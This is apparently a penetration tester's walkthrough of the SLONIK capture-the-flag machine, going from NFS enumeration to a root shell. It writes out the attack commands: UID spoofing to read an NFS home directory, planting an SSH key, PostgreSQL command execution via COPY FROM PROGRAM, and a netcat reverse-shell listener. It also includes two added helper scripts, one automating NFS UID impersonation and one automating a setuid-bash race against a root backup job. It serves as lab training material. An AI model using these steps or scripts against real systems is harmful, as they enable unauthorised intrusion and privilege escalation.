Here are my notes on the SLONIK box from Vulnlab, which has since been deployed to Hack The Box.
SLONIK: 10.10.103.127
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 2d8d0a43a75820736b8cfcb0d12f4507 (ECDSA)
|_ 256 82fb90b0ebac20a2535e3c7cd33c3479 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34599/udp6 mountd
| 100005 1,2,3 35759/tcp mountd
| 100005 1,2,3 40169/tcp6 mountd
| 100005 1,2,3 59798/udp mountd
| 100021 1,3,4 44493/tcp nlockmgr
| 100021 1,3,4 45051/tcp6 nlockmgr
| 100021 1,3,4 49121/udp nlockmgr
| 100021 1,3,4 53757/udp6 nlockmgr
| 100024 1 40097/tcp6 status
| 100024 1 48865/tcp status
| 100024 1 49935/udp6 status
| 100024 1 54669/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
┌──(root㉿kali)-[/home/kali/VULNLAB/SLONIK/10.10.103.127]
└─# showmount -e 10.10.103.127
Export list for 10.10.103.127:
/var/backups *
/home *
mount -t nfs 10.10.103.127:/var/backups . -o nolock
/var/backups:
# Both mounts show the same archive-*.zip files; each is a zipped PostgreSQL base backup (data directory plus configuration).
NFS /home export (the service/ directory is not readable at first):
mount -t nfs 10.10.103.127:/home . -o nolock
┌──(root㉿kali)-[/home/…/VULNLAB/SLONIK/10.10.103.127/nfs]
└─# tree -r .
.
├── home
│ └── service [error opening dir]
└── backups
├── archive-2024-11-18T1758.zip
└── archive-2024-11-18T1757.zip
┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# ls
service
┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Oct 24 2023 .
drwxr-xr-x 4 root root 4.0K Nov 18 13:49 ..
drwxr-x--- 5 1337 1337 4.0K Oct 24 2023 service
The service directory is mode 750 and owned by UID/GID 1337. This is a plain AUTH_SYS (sec=sys) NFSv3 export, so the server trusts whatever UID the client presents, and root_squash only remaps UID 0, not 1337. A local user with UID and GID 1337 is therefore enough to read it:
┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# sudo groupadd -g 1337 hacker1337
┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# sudo useradd -u 1337 -g 1337 -m hacker1337
┌──(root㉿kali)-[/home/…/SLONIK/10.10.103.127/nfs/home]
└─# getent passwd 1337
hacker1337:x:1337:1337::/home/hacker1337:/bin/sh
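The UID-matching trick above, generalised into a small helper. This is an added example, not part of the original notes: it stats every top-level directory of a mounted export, reports the ones the current user cannot enter, and creates a matching local account (hypothetical script name nfs_uid.sh; the generated user name nfsuser<uid> is arbitrary, since only the numeric IDs travel over the wire). It only helps against sec=sys exports; a sec=krb5 export does not trust client-asserted UIDs.

```shell
#!/bin/bash
# Added example (not from the original notes): impersonate the owner UID/GID of
# a directory on an NFS export. Works against AUTH_SYS (sec=sys) exports, where
# the server trusts whatever UID the client sends; root_squash only remaps UID 0.
set -u

# Print "uid gid" of the owner of a path, numerically, so no name lookup is needed.
nfs_owner() {
    stat -c '%u %g' "$1"
}

# For every subdirectory directly under the mount point that the current user
# cannot read or enter, print "<uid> <gid> <path>".
unreadable_dirs() {
    local mnt=$1 d
    for d in "$mnt"/*/; do
        [ -d "$d" ] || continue
        if ! [ -r "$d" ] || ! [ -x "$d" ]; then
            printf '%s %s\n' "$(nfs_owner "$d")" "${d%/}"
        fi
    done
}

# Create a local user with the given UID/GID unless one already exists, and
# print the account name. Needs root on the attacking box for groupadd/useradd.
ensure_local_uid() {
    local uid=$1 gid=$2 name=${3:-nfsuser$1}
    if getent passwd "$uid" >/dev/null; then
        getent passwd "$uid" | cut -d: -f1
        return 0
    fi
    getent group "$gid" >/dev/null || groupadd -g "$gid" "$name"
    useradd -u "$uid" -g "$gid" -M -s /bin/sh "$name"
    echo "$name"
}

# Usage: ./nfs_uid.sh /path/to/mounted/export
main() {
    local mnt=$1 uid gid path name
    unreadable_dirs "$mnt" | while read -r uid gid path; do
        name=$(ensure_local_uid "$uid" "$gid")
        echo "$path is owned by $uid:$gid -> read it with: su - $name -c 'ls -la $path'"
    done
}

[ $# -eq 0 ] || main "$@"
```

Because the check uses access(2), which NFSv3 clients turn into an ACCESS call to the server, the readable/unreadable verdict reflects the server's view, not a local guess.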
su - hacker1337
$ cd nfs
$ ls
backups home
$ cd home
$ ls
service
$ ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Oct 24 2023 .
drwxr-xr-x 4 root root 4.0K Nov 18 13:49 ..
drwxr-x--- 5 hacker1337 hacker1337 4.0K Oct 24 2023 service
$ cd service
$ ls
$ ls
$ ls -lah
total 40K
drwxr-x--- 5 hacker1337 hacker1337 4.0K Oct 24 2023 .
drwxr-xr-x 3 root root 4.0K Oct 24 2023 ..
-rw-rw-r-- 1 hacker1337 hacker1337 90 Oct 24 2023 .bash_history
-rw-r--r-- 1 hacker1337 hacker1337 220 Oct 24 2023 .bash_logout
-rw-r--r-- 1 hacker1337 hacker1337 3.7K Oct 24 2023 .bashrc
drwx------ 2 hacker1337 hacker1337 4.0K Oct 24 2023 .cache
drwxrwxr-x 3 hacker1337 hacker1337 4.0K Oct 24 2023 .local
-rw-r--r-- 1 hacker1337 hacker1337 807 Oct 24 2023 .profile
-rw------- 1 hacker1337 hacker1337 326 Oct 24 2023 .psql_history
drwxrwxr-x 2 hacker1337 hacker1337 4.0K Oct 24 2023 .ssh
$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description) VALUES ('service', 'aaabf0d39951f3e6c3e8a7911df524c2', 'network access account');
select * from users;
\q
$ cd .ssh
$ ls
authorized_keys id_ed25519.pub
$ cat id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILVvRkNfH3506q1Odsrb551zZC2AeLTYW135HnJLpjCe service@slonik
aaabf0d39951f3e6c3e8a7911df524c2:service
service:service
# The MD5 cracks to "service", but service:service does not get us an SSH shell: a rabbit hole. Note that .ssh/ holds only the public key and authorized_keys, no private key. What we do have is write access to .ssh/ as UID 1337 over NFS, so our own public key can go into authorized_keys and the service account can be used for tunnelling only.
$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit
SSH forwarding of a Unix domain socket (here PostgreSQL's /var/run/postgresql/.s.PGSQL.5432) through the service account. ssh refuses to bind if /tmp/.s.PGSQL.5432 already exists locally, so remove a stale socket first:
ssh -N -L /tmp/.s.PGSQL.5432:/var/run/postgresql/.s.PGSQL.5432 service@slonik.vl
ssh -N -L /tmp/.s.PGSQL.5432:/var/run/postgresql/.s.PGSQL.5432 service@10.10.103.127
# the reverse direction, for reference (a socket on the remote host forwarded to a local one):
ssh -R /tmp/remote_socket:/tmp/local_socket user@remote_host
https://code.whatever.social/exchange/unix/questions/498862/how-is-forwarding-can-be-also-done-through-unix-sockets-done
https://seriotonctf.github.io/2023/11/02/Slonik-Vulnlab/
psql -h /tmp -U postgres
Nothing interesting in the databases themselves, but we are connected as the postgres superuser (COPY ... FROM PROGRAM needs superuser or the pg_execute_server_program role), so we can run commands on the server as the postgres OS user:
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
service=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
service=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
service=# SELECT * FROM cmd_exec;
cmd_output
------------------------------------------------------------------------
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
(1 row)
service=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
service=# SELECT * FROM cmd_exec;
cmd_output
------------------------------------------------------------------------
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
(2 rows)
POSTGRESQL RCE !
Turn it into a reverse shell (same COPY ... FROM PROGRAM, payload pointing at a netcat listener), then upgrade the TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
┌──(root㉿kali)-[/home/kali/VULNLAB/SLONIK]
└─# sudo rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.103.127] 57300
whoami
postgres
id
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@slonik:/var/lib/postgresql/14/main$
USER-SHELL !
postgres@slonik:/var/lib/postgresql$ whoami
whoami
postgres
postgres@slonik:/var/lib/postgresql$ id
id
uid=115(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
postgres@slonik:/var/lib/postgresql$ pwd
pwd
/var/lib/postgresql
postgres@slonik:/var/lib/postgresql$ ls
ls
14 user.txt
postgres@slonik:/var/lib/postgresql$ cat user.txt
cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
no sudo -l
no gcc
no getcap binaries
no kernel exploit.
nothing in /etc/crontab, /etc/cron.*, /etc/cron.d or crontab -l either, so the root job that pspy shows below is scheduled somewhere we cannot read (most likely root's own crontab).
pspy64s:
2024/11/18 20:21:01 CMD: UID=0 PID=4244 | /bin/sh -c /usr/bin/backup
2024/11/18 20:21:01 CMD: UID=0 PID=4245 | /bin/bash /usr/bin/backup
2024/11/18 20:21:01 CMD: UID=0 PID=4246 | /usr/bin/date +%FT%H%M
2024/11/18 20:21:01 CMD: UID=0 PID=4247 | /usr/bin/rm -rf /opt/backups/current/PG_VERSION /opt/backups/current/backup_label /opt/backups/current/backup_manifest /opt/backups/current/base /opt/backups/current/global /opt/backups/current/pg_commit_ts /opt/backups/current/pg_dynshmem /opt/backups/current/pg_logical /opt/backups/current/pg_multixact /opt/backups/current/pg_notify /opt/backups/current/pg_replslot /opt/backups/current/pg_serial /opt/backups/current/pg_snapshots /opt/backups/current/pg_stat /opt/backups/current/pg_stat_tmp /opt/backups/current/pg_subtrans /opt/backups/current/pg_tblspc /opt/backups/current/pg_twophase /opt/backups/current/pg_wal /opt/backups/current/pg_xact /opt/backups/current/postgresql.auto.conf
2024/11/18 20:21:01 CMD: UID=0 PID=4248 | /usr/bin/perl /usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:21:01 CMD: UID=115 PID=4249 | postgres: 14/main: walsender postgres [local] initializing
2024/11/18 20:21:01 CMD: UID=0 PID=4251 | /usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:21:01 CMD: UID=115 PID=4250 | postgres: 14/main: walsender postgres [local] streaming 1/A40000D8
2024/11/18 20:21:02 CMD: UID=0 PID=4252 | /usr/bin/zip -r /var/backups/archive-2024-11-18T2021.zip /opt/backups/current/
2024/11/18 20:21:03 CMD: UID=0 PID=4253 | /bin/bash /usr/bin/backup
2024/11/18 20:21:03 CMD: UID=0 PID=4255 | /usr/bin/wc -l
2024/11/18 20:21:03 CMD: UID=0 PID=4254 | /usr/bin/find /var/backups/ -maxdepth 1 -type f -o -type d
2024/11/18 20:21:33 CMD: UID=115 PID=4258 | postgres: 14/main: autovacuum worker postgres
[SNIP]
2024/11/18 20:22:01 CMD: UID=0 PID=4261 | /bin/sh -c /usr/bin/backup
2024/11/18 20:22:01 CMD: UID=0 PID=4262 | /bin/bash /usr/bin/backup
2024/11/18 20:22:01 CMD: UID=0 PID=4263 | /usr/bin/date +%FT%H%M
2024/11/18 20:22:01 CMD: UID=0 PID=4264 | /usr/bin/rm -rf /opt/backups/current/PG_VERSION /opt/backups/current/backup_label /opt/backups/current/backup_manifest /opt/backups/current/base /opt/backups/current/global /opt/backups/current/pg_commit_ts /opt/backups/current/pg_dynshmem /opt/backups/current/pg_logical /opt/backups/current/pg_multixact /opt/backups/current/pg_notify /opt/backups/current/pg_replslot /opt/backups/current/pg_serial /opt/backups/current/pg_snapshots /opt/backups/current/pg_stat /opt/backups/current/pg_stat_tmp /opt/backups/current/pg_subtrans /opt/backups/current/pg_tblspc /opt/backups/current/pg_twophase /opt/backups/current/pg_wal /opt/backups/current/pg_xact /opt/backups/current/postgresql.auto.conf
2024/11/18 20:22:01 CMD: UID=0 PID=4265 | /usr/bin/perl /usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:22:01 CMD: UID=115 PID=4266 | postgres: 14/main: walsender postgres [local] initializing
2024/11/18 20:22:01 CMD: UID=0 PID=4268 | /usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
2024/11/18 20:22:01 CMD: UID=115 PID=4267 | postgres: 14/main: walsender postgres [local] streaming 1/A60000D8
2024/11/18 20:22:02 CMD: UID=0 PID=4269 | /usr/bin/zip -r /var/backups/archive-2024-11-18T2022.zip /opt/backups/current/
2024/11/18 20:22:03 CMD: UID=0 PID=4270 | /bin/bash /usr/bin/backup
2024/11/18 20:22:03 CMD: UID=0 PID=4272 | /bin/bash /usr/bin/backup
2024/11/18 20:22:03 CMD: UID=0 PID=4271 | /usr/bin/find /var/backups/ -maxdepth 1 -type f -o -type d
/usr/bin/backup:
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /usr/bin/backup
ls -lah /usr/bin/backup
-rwxr-xr-x 1 root root 392 Oct 24 2023 /usr/bin/backup
postgres@slonik:/var/lib/postgresql/14/main$ cat /usr/bin/backup
cat /usr/bin/backup
#!/bin/bash
date=$(/usr/bin/date +"%FT%H%M")
/usr/bin/rm -rf /opt/backups/current/*
/usr/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/
/usr/bin/zip -r "/var/backups/archive-$date.zip" /opt/backups/current/
count=$(/usr/bin/find "/var/backups/" -maxdepth 1 -type f -o -type d | /usr/bin/wc -l)
if [ "$count" -gt 10 ]; then
/usr/bin/rm -rf /var/backups/*
fi
# Every minute (see the pspy timestamps) root wipes /opt/backups/current/, runs pg_basebackup against the local socket, which copies the whole live data directory (/var/lib/postgresql/14/main, owned by postgres) into /opt/backups/current/ as root, zips it into /var/backups/, and deletes everything in /var/backups/ once it holds more than 10 entries.
So: copy /bin/bash into the data directory (we own it as postgres), set the setuid bit, and wait for root's pg_basebackup to copy it into /opt/backups/current/, where the copy is root-owned with the mode bits preserved. Running that copy with -p then gives a root shell.
postgres@slonik:/var/lib/postgresql/14/main$ cp /bin/bash bash
cp /bin/bash bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 bash
chmod 777 bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod +x bash
chmod +x bash
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s bash
chmod u+s bash
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah | grep "bash"
ls -lah | grep "bash"
-rwsrwxrwx 1 postgres postgres 1.4M Nov 18 20:43 bash
Then wait up to a minute for the job to copy the setuid bash into /opt/backups/current/ (owner root, setuid bit preserved):
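The plant-and-wait procedure above as a script, added here as an example rather than taken from the notes. It copies /bin/bash into the directory the root job reads from, sets only the bits that matter (4755 instead of 777 plus u+s), and polls until a root-owned setuid copy appears in the destination before executing it with -p. The script name suid_race.sh is an assumption; the two directories are the ones from /usr/bin/backup and are passed as arguments.

```shell
#!/bin/bash
# Added example (not from the original notes): plant a setuid bash where a
# root-run copy job (here pg_basebackup into /opt/backups/current/) will pick
# it up with its mode preserved, then wait for the root-owned copy.
set -u

# Copy /bin/bash into the watched directory with setuid set. Ownership of the
# destination copy flips to root because root creates that file; the mode,
# including the setuid bit, is carried over by the copy.
plant_suid_bash() {
    local srcdir=$1 name=${2:-bash}
    cp /bin/bash "$srcdir/$name" && chmod 4755 "$srcdir/$name"   # 4755 = setuid + rwxr-xr-x
    [ -u "$srcdir/$name" ]
}

# True when $1 exists, has the setuid bit and is owned by UID 0.
is_suid_root() {
    [ -u "$1" ] && [ "$(stat -c %u "$1")" = 0 ]
}

# Poll every 5 s until $1 is a root-owned setuid file; fail after $2 seconds.
wait_for_suid_root() {
    local path=$1 timeout=${2:-120} waited=0
    until is_suid_root "$path"; do
        [ "$waited" -lt "$timeout" ] || return 1
        sleep 5; waited=$((waited + 5))
    done
}

# Usage: ./suid_race.sh /var/lib/postgresql/14/main /opt/backups/current
main() {
    local plant_dir=$1 copy_dir=$2
    plant_suid_bash "$plant_dir" || { echo "could not plant in $plant_dir" >&2; exit 1; }
    if wait_for_suid_root "$copy_dir/bash" 180; then
        exec "$copy_dir/bash" -p   # -p keeps euid=0 instead of dropping it
    fi
    echo "no root-owned setuid copy appeared in $copy_dir" >&2
    exit 1
}

[ $# -eq 0 ] || main "$@"
```

The -p flag matters: without it bash resets the effective UID to the real one at startup, and the shell would come back as postgres despite the setuid bit.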
postgres@slonik:/opt/backups/current$ pwd
pwd
/opt/backups/current
postgres@slonik:/opt/backups/current$ ls -lah | grep "bash"
ls -lah | grep "bash"
-rwsrwxrwx 1 root root 1.4M Nov 18 20:45 bash
-rws------ 1 root root 1.4M Nov 18 20:45 mybash
postgres@slonik:/opt/backups/current$ ./bash -p
./bash -p
bash-5.1# whoami
whoami
root
bash-5.1# id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
ROOT-SHELL !
bash-5.1# whoami
whoami
root
bash-5.1# id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
bash-5.1# pwd
pwd
/root
bash-5.1# ls
ls
root.txt snap
bash-5.1# cat root.txt
cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Remaining nmap output (the extra RPC ports and the UDP scan):
35759/tcp open mountd 1-3 (RPC #100005)
42363/tcp open mountd 1-3 (RPC #100005)
44493/tcp open nlockmgr 1-4 (RPC #100021)
48865/tcp open status 1 (RPC #100024)
53517/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT STATE SERVICE VERSION
111/udp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 35759/tcp mountd
| 100005 1,2,3 59798/udp mountd
| 100021 1,3,4 44493/tcp nlockmgr
| 100021 1,3,4 49121/udp nlockmgr
| 100024 1 48865/tcp status
| 100024 1 54669/udp status
|_ 100227 3 2049/tcp nfs_acl
